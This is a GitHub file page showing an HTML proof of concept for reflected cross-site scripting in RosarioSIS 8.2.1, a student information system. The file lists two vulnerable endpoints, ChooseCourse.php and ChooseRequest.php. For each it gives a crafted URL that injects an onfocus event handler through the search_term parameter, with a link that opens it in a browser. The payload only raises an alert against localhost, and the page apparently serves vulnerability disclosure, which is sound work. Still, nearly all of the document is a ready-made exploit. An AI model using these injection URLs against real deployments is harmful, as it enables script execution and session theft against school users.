-
Notifications
You must be signed in to change notification settings - Fork 0
/
RosarioSIS_PoC.htm
20 lines (20 loc) · 1.01 KB
/
RosarioSIS_PoC.htm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<!DOCTYPE html>
<html>
<head>
<title>PoC - RosarioSIS 8.2.1 Reflected XSS</title>
<style>li{margin-bottom: 22px;}</style>
</head>
<body>
<h1>Cross Site Scripting (XSS) in RosarioSIS 8.2.1</h1>
<ol>
<li>
XSS in Modules.php?modname=misc/ChooseCourse.php&modfunc=choose_course&course_modfunc=search via the search_term parameter<br>
<a href="#" onclick='window.open("http://localhost/rosariosis/Modules.php?modname=misc/ChooseCourse.php&modfunc=choose_course&course_modfunc=search&last_year=&search_term=%22%20onfocus%3D%22alert%28%60XSS%60%29"); return false;'>Open in Browser</a>
</li>
<li>
XSS in Modules.php?modname=misc/ChooseRequest.php&modfunc=choose_course&course_modfunc=search via the search_term parameter<br>
<a href="#" onclick='window.open("http://localhost/rosariosis/Modules.php?modname=misc/ChooseRequest.php&modfunc=choose_course&course_modfunc=search&last_year=&search_term=%22%20onfocus%3D%22alert%28%60XSS%60%29"); return false;'>Open in Browser</a>
</li>
</ol>
</body>
</html>